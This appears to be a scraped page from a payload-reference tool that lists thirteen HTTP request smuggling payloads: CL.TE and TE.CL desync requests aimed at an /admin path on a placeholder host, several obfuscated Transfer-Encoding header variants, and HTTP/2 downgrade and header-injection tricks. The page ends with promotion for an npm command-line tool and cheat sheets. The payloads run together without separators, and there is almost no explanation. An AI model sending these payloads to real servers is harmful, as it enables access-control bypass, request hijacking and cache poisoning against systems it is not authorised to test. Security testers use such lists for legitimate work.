$loading...
HTTP request smuggling payloads for CL.TE, TE.CL, TE.TE desync, and HTTP/2 downgrade attacks. (13 payloads)
POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGPOST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nGPOST /admin HTTP/1.1\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\nQTransfer-Encoding: chunked\r\nTransfer-encoding: cowTransfer-Encoding : chunkedTransfer-Encoding: chunked\r\nTransfer-Encoding: identityTransfer-Encoding:\tchunkedTransfer-Encoding:\nchunkedX: x\nTransfer-Encoding: chunkedSend HTTP/2 with injected \r\n in header value:method: GET\r\nTransfer-Encoding: chunkedUse HTTP/2 CONNECT for tunnelingLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides